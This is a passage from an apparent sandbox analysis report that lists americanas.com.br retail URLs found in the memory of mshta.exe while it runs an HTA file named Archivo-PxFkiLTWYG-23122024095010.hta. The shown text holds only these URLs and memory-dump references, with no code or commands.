00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508140072.000000000ABB9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=pfm_hm_tt_1_0_natal24
Source: mshta.exe, 00000001.00000003.12401711671.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402284245.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12462713387.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402767156.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/oferta-do-dia?chave=dk_hm_ats_2_9_oddmeta.smallmeta.small.hei
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/oferta-do-dia?chave=prf_hm_0_tt_7_
Source: mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510409430.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/americanas
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mais-clima?chave=pfm_home_sustentabilidade_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541572740.000000000A9F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485820978.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485974974.0000000009DA2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508038235.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=brd_hm_bt_0_footer_amundo
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554675837.000000000A99E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555859176.000000000BDFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578720986.000000000BE00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511563098.000000000BDFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=dk_hm_branding_amundo
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504872955.00000000095E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=pfm_home_amundo_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=prf_hs_0_dt_1_00_amundo
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555859176.000000000BDFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578720986.000000000BE00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-social?chave=dk_hm_branding_social
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509151573.000000000BE37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508834101.000000000BE2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_ats_2_1_baixeoapp
Source: mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_ats_2_1_baixeoappvr
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574609531.000000000962B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509151573.000000000BE37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508834101.000000000BE2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_dt_2_11_baixeoapp
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559679419.0000000009651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557355182.000000000964E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516075733.000000000964D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_baixeoapp_faixa
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000ABA4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509932117.000000000BE33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508140072.000000000ABB9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504743839.000000000ABA4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573530715.0000000009530000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578843377.000000000BE34000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508834101.000000000BE2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge
Source: mshta.exe, 00000001.00000003.12556397852.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573257257.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_geU
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567232187.00000000095D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502431408.00000000095D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=prf_hs_0_dt_1_00_baixeoapp
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509642076.00000000095F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 